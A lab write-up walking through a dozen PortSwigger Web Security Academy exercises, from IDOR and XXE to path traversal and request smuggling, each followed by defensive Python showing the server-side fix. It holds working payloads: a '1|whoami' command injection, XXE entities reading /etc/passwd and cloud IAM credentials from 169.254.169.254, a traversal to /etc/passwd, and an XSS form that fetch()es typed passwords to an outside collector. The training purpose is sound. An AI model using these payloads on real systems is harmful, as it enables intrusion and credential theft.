Table of Contents
PortSwigger Labs
Insecure direct object references (IDOR)
1: Register your account on PortSwigger.
Website: https://portswigger.net/users/register
2: Open the Lab: Insecure direct object references.
Website: https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references
3: Access the LAB.

4: Select the Live chat tab.

5: Open Burp Suite.
6: Turn Intercept on.
7: Send a message, then select View transcript.

8: Refresh the Live Chat page.
Shortcut key: f5
9: View the transcript.
10: Send to the Repeater.
Shortcut key: ctrl + r

11: Send the data.

12: Follow the redirection.

13: Change the parameter and find the password.
Note: Replace 3.txt with 1.txt in the transcript filename.

14: The password is:
Password: hl86m5x4uyvuai88ox6p
15: Turn Intercept off.
16: Log in to the account.
17: The username and password:

Username: carlos
Password: hl86m5x4uyvuai88ox6p
18: The LAB has been completed.

Excessive trust in client-side controls
1: Access the Lab: Excessive trust in client-side controls.

2: Log in to the account.

3: The username and password:
Username: wiener
Password: peter

4: Open Burp Suite and turn Intercept on.
5: Buy the Lightweight “l33t” Leather Jacket.

6: Add the product to the cart.

7: Send to the Repeater.
Shortcut: ctrl + r

8: Turn Intercept off.

10: Go to the cart and check the Lightweight “l33t” Leather Jacket price.

11: The Lightweight “l33t” Leather Jacket price is $1227.00.
12: Reduce the Lightweight “l33t” Leather Jacket price in Burp Suite and send it.

13: Refresh the cart page.
Shortcut key: f5
14: The price of the Lightweight “l33t” Leather Jacket has been reduced.

15: Place the order.
16: The order has been placed.
17: The lab has been completed.
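
The server-side fix for this lab, as an added example that is not the lab's or PortSwigger's code: the cart prices every line from the catalog and ignores any price the browser submits. The catalog entry, the quantity limit and the tamper log are constructed; the price is the one quoted above.

```python
# Added example, not the lab's code: pricing the cart from the server-side
# catalog. The catalog entry is constructed; the price is the one quoted above.
from decimal import Decimal

CATALOG = {"1": ("Lightweight \"l33t\" Leather Jacket", Decimal("1227.00"))}
TAMPER_LOG = []  # detection hook: requests that tried to supply their own price


def add_to_cart(cart, form):
    """Only productId and quantity are trusted from the form; any 'price'
    field is ignored and recorded, because the price is a server-side fact."""
    product_id = form.get("productId")
    if product_id not in CATALOG:
        return 400, "unknown product"
    try:
        quantity = int(form.get("quantity", "1"))
    except ValueError:
        return 400, "bad quantity"
    if not 1 <= quantity <= 99:
        return 400, "bad quantity"
    if "price" in form:
        TAMPER_LOG.append(f"productId={product_id} sent price={form['price']}; ignored")
    cart.append((product_id, quantity))
    return 200, "added"


def order_total(cart):
    """Recomputed from the catalog at checkout, never carried in the request."""
    return sum((CATALOG[pid][1] * qty for pid, qty in cart), Decimal("0"))
```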

Unprotected admin functionality with unpredictable URL
1: Access the Lab: Unprotected admin functionality with unpredictable URL.

2: View the page source.
Shortcut key: Ctrl + U

3: Search for "admin" in the page source.
Shortcut key: Ctrl + F

4: Go to My account.
5: Access the Admin Panel.

6: Delete the carlos user.

7: The LAB has been solved.
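
The two access-control gaps above (object-level in the IDOR lab, function-level in this one) share one fix: decide from the session, not from the URL the client found. As an added example that is not the lab's or PortSwigger's code, transcript ownership and the role table are constructed; the usernames are the ones used in the write-up.

```python
# Added example, not the lab's code: access decisions taken from the session.
# Transcript ownership and the role table are constructed; usernames are the
# write-up's.
TRANSCRIPT_OWNER = {"1.txt": "carlos", "2.txt": "wiener", "3.txt": "wiener"}


def read_transcript(session_user, filename):
    """Object-level check: a transcript is served only to the user it belongs to."""
    owner = TRANSCRIPT_OWNER.get(filename)
    if owner is None or owner != session_user:
        # The same 403 for "no such file" and "not yours": no enumeration oracle
        return 403, "Forbidden"
    return 200, f"<transcript {filename} for {owner}>"


def delete_user(users, session_user, target):
    """Function-level check: the role comes from the session, never from the
    caller having discovered the admin URL. Returns (status, updated table)."""
    if users.get(session_user) != "admin":
        return 403, users
    if target not in users or target == session_user:
        return 400, users
    remaining = {name: role for name, role in users.items() if name != target}
    return 200, remaining
```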

OS command injection, simple case
1: Access the LAB.
Website: https://portswigger.net/web-security/os-command-injection/lab-simple

2: Open Burp Suite and turn Intercept on.
3: Open the Product.

4: Check the Stock.

5: Go to Proxy, open HTTP history and find the POST request for the product stock check.

6: Send to the Repeater.
Shortcut key: Ctrl + R

7: Modify the storeId parameter, giving it the value 1|whoami.
Example: productId=1&storeId=1|whoami

8: Turn Intercept off and refresh the page.
9: The LAB is completed.
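
How a stock check avoids this class of bug, as an added example that is not the lab's or PortSwigger's code: both ids are validated as small integers and the checker is started with an argv list and no shell, so a value like 1|whoami is refused before any process runs. STOCK_CHECKER is a placeholder path.

```python
# Added example, not the lab's code: a stock check that never goes through a
# shell. STOCK_CHECKER is a placeholder path for whatever program the shop runs.
import re
import subprocess

STOCK_CHECKER = "/usr/local/bin/stockreport"  # placeholder
ID_PATTERN = re.compile(r"[0-9]{1,6}")


def build_stock_argv(product_id, store_id):
    """Validate both ids as small integers and return an argv list.
    '1|whoami' fails here, before any process is started."""
    for name, value in (("productId", product_id), ("storeId", store_id)):
        if not ID_PATTERN.fullmatch(value):
            raise ValueError(f"{name} must be 1-6 digits")
    return [STOCK_CHECKER, product_id, store_id]


def check_stock(product_id, store_id, run=subprocess.run):
    """Invoke the checker with an argv list and shell=False (the default):
    '|', ';' or '$(...)' in arguments are passed literally, never interpreted."""
    argv = build_stock_argv(product_id, store_id)
    proc = run(argv, capture_output=True, text=True, timeout=5, check=False)
    return proc.returncode, proc.stdout.strip()
```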

Basic SSRF against the local server
1: Access the Lab.
Website: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

2: Open Burp Suite.
3: Open the product.

4: Check the product stock.

5: Find the POST request in Burp Suite and look at the stockApi parameter.

6: Send the request containing stockApi to the Repeater.
Shortcut key: Ctrl + R

7: Replace the stockApi value with the URL of the localhost admin panel.

8: Delete the carlos user.

9: Send the request.

10: The lab has been completed.
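
Validating stockApi before the server fetches it, as an added example that is not the lab's or PortSwigger's code: only http(s) to an allow-listed backend host and path prefix passes, and IP literals are refused outright. The allowed host and path prefix are constructed placeholders; DNS resolution of the allowed host is not covered here.

```python
# Added example, not the lab's code: the stockApi URL is validated before the
# server fetches it. Allowed host and path prefix are constructed placeholders.
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"stock.example.internal"}  # the real stock backend goes here
ALLOWED_PATH_PREFIX = "/stock/"


def validate_stock_api(url):
    """Return (ok, reason). Only http(s) to the allow-listed backend passes;
    IP literals are refused so localhost, 127.0.0.1, [::1] and the cloud
    metadata address 169.254.169.254 never reach the fetcher."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        if ip.is_loopback or ip.is_link_local or ip.is_private:
            return False, "non-public address"
        return False, "IP literals not allowed"
    if host.lower() not in ALLOWED_HOSTS:
        return False, "host not on allowlist"
    if not parts.path.startswith(ALLOWED_PATH_PREFIX):
        return False, "path not allowed"
    return True, "ok"
```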

Stored XSS into HTML context with nothing encoded
1: Access the Lab.
Website: https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded

2: Open the post.

3: Enter the following payload in the comment box.
Payload: <script>alert(1)</script>
4: Enter a name, email, and website.
5: Click “Post comment”.

6: The Lab has been completed.

2FA simple bypass
1: Access the Lab.
Website: https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass

2: Go to My account.

3: Log in to the account.
Username: wiener
Password: peter

4: Check the Email client.

5: Find the security code.

6: Log in to the account.

7: Note the URL path of the account page.
Path: /my-account

8: Log out of the current account.
9: Go to My account.
10: Log in to the second account.
Username: carlos
Password: montoya

11: How is the two-factor authentication bypassed?

12: Use the /my-account path to skip the two-factor authentication step.
Note: Replace login2 in the URL with /my-account.

13: The Lab has been completed.
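
What the application should have done, as an added example that is not the lab's or PortSwigger's code: the second factor is tracked in the server-side session, so navigating from /login2 straight to /my-account is refused until the code has been verified. The accounts are the write-up's demo users (plaintext passwords only for this demo); the MFA codes are constructed.

```python
# Added example, not the lab's code: the second factor is tracked in the
# server-side session, so /login2 cannot be skipped by typing /my-account.
# Credentials are the write-up's demo accounts (plaintext only for this demo);
# the MFA codes are constructed.
import hmac

USERS = {"wiener": "peter", "carlos": "montoya"}
MFA_CODES = {"wiener": "1234", "carlos": "5678"}


def login(session, username, password):
    """First factor. On success the session records a pending user only."""
    if username not in USERS or not hmac.compare_digest(USERS[username], password):
        return 401, "bad credentials"
    session.clear()
    session.update({"pending_user": username, "mfa_verified": False})
    return 302, "/login2"


def verify_code(session, code):
    """Second factor. Only now does the session become an authenticated one."""
    user = session.get("pending_user")
    if user is None:
        return 400, "no login in progress"
    if not hmac.compare_digest(MFA_CODES[user], code):
        return 401, "bad code"
    session.update({"user": user, "mfa_verified": True})
    del session["pending_user"]
    return 302, "/my-account"


def my_account(session):
    """Authorisation is decided by the session state, not by the URL the
    client navigated to."""
    if "user" not in session or not session.get("mfa_verified"):
        return 302, "/login"
    return 200, f"account page for {session['user']}"
```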

Exploiting XXE using external entities to retrieve files
1: Access the Lab.
Website: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

2: Open Burp Suite.
3: Select the product.

4: Click Check stock.

5: Send the request to the Repeater.
Shortcut key: Ctrl + R

6: Send the request.
7: The XML request body is the XXE-vulnerable input.

8: Insert the XXE payload into the XML request body.
XXE Payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
9: Send the request.

10: Replace the product ID.
Product ID: &xxe;
11: Send the Request.

12: The Lab has been completed.

Exploiting XXE to perform SSRF attacks
1: Access the Lab.
Website: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

2: Open Burp Suite.
3: Select the product.

4: Check the stock units.

5: Send the request to the Repeater.
Shortcut key: Ctrl + R

6: Send the request.

7: Insert the following XXE payload.
Payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

8: Replace the product ID.
Product ID: &xxe;
9: The response should contain “Invalid product ID:” followed by the response from the metadata endpoint, which will initially be a folder name.

10: Update the URL in the DTD to explore the API until you reach the following path.
URL: /latest/meta-data/iam/security-credentials/admin
Complete payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
11: This should return JSON containing the SecretAccessKey.

12: The Lab has been completed.
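
Both XXE labs (file retrieval above, and this SSRF variant) have the same root cause and the same fix: the stock-check parser must not accept a DTD at all. As an added example that is not the lab's or PortSwigger's code, the parser below uses only the standard-library expat bindings and raises the moment a DOCTYPE appears, before any entity could be declared or expanded; element names and the two sample documents are constructed.

```python
# Added example, not the lab's code: a stock-check XML parser that refuses
# any DOCTYPE, so neither file:// nor http://169.254.169.254/ entities can be
# declared. Element names and the two sample documents are constructed.
import xml.parsers.expat


class DoctypeNotAllowed(ValueError):
    pass


def parse_stock_check(xml_bytes):
    """Return {'productId': ..., 'storeId': ...} or raise on DTDs / bad values."""
    parser = xml.parsers.expat.ParserCreate()
    fields, open_elements = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeNotAllowed("DTD declarations are not accepted")

    def start_element(name, attrs):
        open_elements.append(name)
        fields.setdefault(name, "")

    def char_data(data):
        if open_elements:
            fields[open_elements[-1]] += data

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.EndElementHandler = lambda name: open_elements.pop()
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_bytes, True)  # the handler raises before any entity expands
    product_id = fields.get("productId", "").strip()
    store_id = fields.get("storeId", "").strip()
    if not (product_id.isdigit() and store_id.isdigit()):
        raise ValueError("productId and storeId must be integers")
    return {"productId": product_id, "storeId": store_id}


def stock_check_request(xml_bytes):
    """Handler-style wrapper returning (status, payload or reason)."""
    try:
        return 200, parse_stock_check(xml_bytes)
    except DoctypeNotAllowed as exc:
        return 400, str(exc)
    except (xml.parsers.expat.ExpatError, ValueError) as exc:
        return 400, f"invalid XML: {exc}"


SAMPLE_OK = b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
SAMPLE_XXE = (b'<?xml version="1.0"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
              b"<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>")
```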

File path traversal simple case
1: Access the Lab.
Website: https://portswigger.net/web-security/file-path-traversal/lab-simple

2: Open the product.

3: Inspect the page.

4: Open the post.
5: Go to the Network tab and reload the page.
6: Open the Image.

7: Modify the filename parameter.
From: https://0afa00ee04ce470ecfc3a358003d0026.web-security-academy.net/image?filename=45.jpg
To: https://0afa00ee04ce470ecfc3a358003d0026.web-security-academy.net/image?filename=../../../etc/passwd

8: The Lab has been completed.
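
The server-side check that stops this, as an added example that is not the lab's or PortSwigger's code: the filename is joined to the image directory, canonicalised, and then tested for component-wise containment, so ../../../etc/passwd (and an absolute path, or a sibling directory) is refused while 45.jpg is served. IMAGE_DIR is a placeholder and nothing is read from disk.

```python
# Added example, not the lab's code: resolving ?filename= inside the image
# directory. IMAGE_DIR is a placeholder; nothing is read from disk here.
import os

IMAGE_DIR = "/srv/images"  # placeholder for the directory the images live in
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png"}


def resolve_image_path(filename, base_dir=IMAGE_DIR):
    """Return the canonical path to serve, or None when the request must be refused."""
    if not filename or "\x00" in filename:
        return None
    base = os.path.realpath(base_dir)
    # Join first, then canonicalise: "..", "." and symlinks collapse before the check
    candidate = os.path.realpath(os.path.join(base, filename))
    # Component-wise containment, so /srv/images2/x does not pass as a prefix match
    if os.path.commonpath([base, candidate]) != base:
        return None
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    return candidate
```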

Exploiting cross-site scripting to capture passwords
1: Access the lab.
Website: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords

2: Open Burp Suite Professional.
3: Open the post.

4: Go to the Collaborator tab in Burp Suite Professional.
5: Copy the payload using Copy to clipboard.
Example payload: 7u2n0ffvckyj6w0sa6fnktdpzg5htbh0.oastify.com

6: Paste the payload into a post comment.
Payload: <input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://cq6swkb08puo21wx6bbsgy9uvl1mpfd4.oastify.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

7: Take the captured Username and Password.
Username: administrator
Password: rlaj7751lft9s7zeh3fl

8: Go to the My account.

9: Log in to the account.

10: The lab has been completed.
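
Both stored-XSS labs (the alert(1) comment and this password-capturing one) come down to the comment being written into the page unencoded. As an added example that is not the lab's or PortSwigger's code, the renderer below HTML-escapes every field, only links a website if it is an http(s) URL, and sends a Content-Security-Policy whose connect-src would also stop a fetch() to an outside collector; the sample comment is constructed.

```python
# Added example, not the lab's code: rendering a stored comment as text and
# sending a Content-Security-Policy. The sample comment is constructed.
import html
from urllib.parse import urlsplit

CSP = ("default-src 'self'; script-src 'self'; connect-src 'self'; "
       "object-src 'none'; base-uri 'none'; form-action 'self'")


def safe_website(url):
    """Only http(s) links with a host are rendered; anything else is dropped."""
    url = (url or "").strip()
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return url


def render_comment(comment):
    """HTML-escape every field; the email address is stored but never displayed."""
    name = html.escape(comment.get("name", ""), quote=True)
    website = safe_website(comment.get("website"))
    if website:
        name = f'<a href="{html.escape(website, quote=True)}" rel="nofollow noopener">{name}</a>'
    body = html.escape(comment.get("comment", ""), quote=True)
    return f'<section class="comment"><p class="author">{name}</p><p>{body}</p></section>'


def comment_page_response(comment):
    """(headers, body) as a handler would return them."""
    headers = {"Content-Type": "text/html; charset=utf-8",
               "Content-Security-Policy": CSP}
    return headers, render_comment(comment)
```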

HTTP request smuggling, basic CL.TE vulnerability
1: Open Burp Suite.
2: Access the lab: HTTP request smuggling, basic CL.TE vulnerability.
Website: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

3: Send a request to the Repeater.
Shortcut: Ctrl + R

4: Remove the parameters.

5: Change the parameters.

6: Send the request three times.
7: The lab has been completed.
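
What a front end should do with the ambiguity this lab is built on, as an added example that is not the lab's or PortSwigger's code: parse the request headers and refuse anything carrying both Content-Length and Transfer-Encoding (RFC 7230 section 3.3.3 permits treating that as an error), or a Transfer-Encoding that is not exactly "chunked", instead of letting front end and back end choose different framings. The sample requests are constructed.

```python
# Added example, not the lab's code: a front-end framing check for the
# ambiguity a CL.TE chain depends on. The sample requests are constructed.

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request_line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def framing_decision(raw):
    """Decide how the body is delimited, or reject when the answer is ambiguous
    (RFC 7230 s3.3.3 allows rejecting a request carrying both headers)."""
    _, headers, _ = parse_request(raw)
    lengths = [v for n, v in headers if n == b"content-length"]
    codings = [v for n, v in headers if n == b"transfer-encoding"]
    if lengths and codings:
        return "reject", "both Content-Length and Transfer-Encoding present"
    if codings:
        names = [c.strip().lower() for c in b",".join(codings).split(b",")]
        if names != [b"chunked"]:
            return "reject", "Transfer-Encoding is not exactly 'chunked'"
        return "chunked", "body framed by chunked encoding"
    if lengths:
        if len(set(lengths)) > 1 or not lengths[0].isdigit():
            return "reject", "malformed or conflicting Content-Length"
        return "content-length", f"body framed by Content-Length {lengths[0].decode()}"
    return "no-body", "no message body"


SAMPLE_PLAIN = b"POST / HTTP/1.1\r\nHost: shop\r\nContent-Length: 5\r\n\r\nhello"
SAMPLE_CL_TE = (b"POST / HTTP/1.1\r\nHost: shop\r\nContent-Length: 5\r\n"
                b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n")
```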
